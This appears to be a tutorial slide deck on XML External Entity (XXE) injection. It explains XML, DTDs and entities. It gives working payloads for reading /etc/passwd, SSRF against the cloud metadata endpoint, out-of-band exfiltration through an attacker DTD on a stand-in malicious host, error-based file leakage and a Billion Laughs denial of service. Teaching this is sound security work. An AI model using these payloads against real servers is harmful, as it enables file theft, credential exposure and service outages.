Injection Attacks: The Complete 2020 Guide

XXE Injections - Overview


<?xml version="1.0" encoding="UTF-8"?>
<document>
  <patients>
    <patientName>Christophe Limpalair</patientName>
    <ssn>222-22-2222</ssn>
    <address>222 Great Address</address>
  </patients>
</document>

Example XML

XML

Stands for eXtensible Markup Language

XML defines a set of rules for encoding documents in a format that is both human-readable and machine-readable

...kind of like HTML

Potential impact of XXE attacks

Attackers could view files from the app server (ie: password files)

Denial of Service (DoS) attacks

Server-Side Request Forgery (SSRF) attacks


<?xml version="1.0" encoding="UTF-8"?>
<document>
  <patients>
    <patientName>Christophe Limpalair</patientName>
    <ssn>222-22-2222</ssn>
    <address>222 Great Address</address>
  </patients>
</document>



<?xml version="1.0" encoding="UTF-8"?>
<document>
  <patients>
    <patientName>Christophe Limpalair</patientName>
    <ssn>222-22-2222</ssn>
    <address>222 Great Address</address>
  </patients>
</document>



<?xml version="1.0" encoding="UTF-8"?>
<document>
  <patients>
    <patientName>Christophe Limpalair</patientName>
    <ssn>222-22-2222</ssn>
    <address>222 Great Address</address>
  </patients>
</document>



<?xml version="1.0" encoding="UTF-8"?>
<document>
  <patients>
    <patientName>Christophe Limpalair</patientName>
    <ssn>222-22-2222</ssn>
    <address>222 Great Address</address>
  </patients>
</document>



<!DOCTYPE document[ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>

Your app may be vulnerable if:

  • It accepts XML or XML uploads, or inserts untrusted data into XML docs
  • Document Type Definitions (aka DTDs) are enabled
  • You use SAML for identity processing since SAML uses XML

DTD

DTD stands for Document Type Definition

It defines what is considered a "well-formed" and "valid" XML document


<?xml version = "1.0" encoding = "UTF-8" standalone = "yes" ?>
<!DOCTYPE patient [
   <!ELEMENT patient (name,ssn,phone)>
   <!ELEMENT name (#PCDATA)>
   <!ELEMENT ssn (#PCDATA)>
   <!ELEMENT phone (#PCDATA)>
]>

DTD


<?xml version = "1.0" encoding = "UTF-8" standalone = "yes" ?>
<!DOCTYPE patient [
   <!ELEMENT patient (name,ssn,phone)>
   <!ELEMENT name (#PCDATA)>
   <!ELEMENT ssn (#PCDATA)>
   <!ELEMENT phone (#PCDATA)>
]>

<patient>
   <name>Christophe Limpalair</name>
   <ssn>222-22-2222</ssn>
   <phone>(222) 123-4567</phone>
</patient>

Internal DTD


<?xml version = "1.0" encoding = "UTF-8" standalone = "no" ?>
<!DOCTYPE patient SYSTEM "patient.dtd">
<patient>
   <name>Christophe Limpalair</name>
   <ssn>222-22-2222</ssn>
   <phone>(011) 123-4567</phone>
</patient>

External DTD


   <!ELEMENT address (name,ssn,phone)>
   <!ELEMENT name (#PCDATA)>
   <!ELEMENT ssn (#PCDATA)>
   <!ELEMENT phone (#PCDATA)>

patient.dtd

DTD Entities

DTD Entities are kind of like variables. You can store information within those variables for later use

Entities act as references or shortcuts to data

DTD Entities


<!ENTITY author "Christophe Limpalair">

<author>&author;</author>

Internal entity

DTD Entities


<!DOCTYPE document SYSTEM "patients.dtd">

External entity

Type of XXE attacks

  • Retrieving files
  • Performing SSRF attacks
  • Out-of-band data exfiltration
  • Using error messages to retrieve data
  • Denial of Service attacks

Retrieving files


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE document SYSTEM "patients.dtd">
<document>
  <patients>
    <patientName>Christophe Limpalair</patientName>
    <ssn>222-22-2222</ssn>
    <address>222 Great Address</address>
  </patients>
</document>

External entity

Retrieving files


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE document[ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<document>
  <patients>
    <patientName>&xxe;</patientName>
    <ssn>222-22-2222</ssn>
    <address>222 Great Address</address>
  </patients>
</document>

External entity

Output of /etc/passwd

Performing SSRF attacks

SSRF stands for Server-Side Request Forgery

It allows an attacker to cause unintended actions from the application's server

Performing SSRF attacks

HTTP request

Accessing the server's metadata

Although you can only access instance metadata and user data from within the instance itself, the data is not protected by authentication or cryptographic methods. Anyone who has direct access to the instance, and potentially any software running on the instance, can view its metadata. Therefore, you should not store sensitive data, such as passwords or long-lived encryption keys, as user data.

Accessing the server's metadata


<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/"> ]>
<stockCheck>
  <productId>&xxe;</productId>
</stockCheck>

Out-of-band data exfiltration

HTTP request

Out-of-band data exfiltration



<!DOCTYPE data [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM "http://example-malicious-url.com/payload.dtd">
  %dtd;
]>
<data>&send;</data>



<!ENTITY % all "<!ENTITY send SYSTEM "http://example-malicious-url.com/?file=%file;'>">
%all;

Attacker DTD (http://example-malicious-url.com/payload.dtd)

Out-of-band data exfiltration



<!ENTITY % payload SYSTEM "file:///etc/passwd">
<!ENTITY % eval '<!ENTITY % error SYSTEM “file:///fakepath/%payload;”>'> %eval; %error;




<?xml version="1.0" encoding="UTF-8"?><root>
<errors>
<errorMessage>java.io.FileNotFoundException: file:///fakepath/root:x:0:0:root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh...

XXE attacks via file uploads

<?xml version="1.0" encoding="utf-8"?>
<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"
	 viewBox="0 0 1206 1683.699" enable-background="new 0 0 1206 1683.699" xml:space="preserve">
<g>
	<path d="M1112.582,344.294c-15.849-37.399-91.976-109.324-91.162-108.324c-21.912-26.938-23.368-32.534-32.562-46.854
		c-12.374-18.937-11.253-7.263-41.163-55.556c-10.826-17.547-52.459-29.704-58.209-32.428c-17.557-8.318-31.574-20.846-50.328-27.5
		c-45.883-16.281-95.603-15.086-142.468-26.771c-5.7-1.421-12.417-2.627-16.882,1.19c-2.827,2.417-3.92,6.225-5.596,9.548

Example SVG

DoS Attack


<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

Example of Billion Laughs attack

Overview of XXE injections

By Christophe Limpalair

Made with Slides.com

Overview of XXE injections

  • 453

More from Christophe Limpalair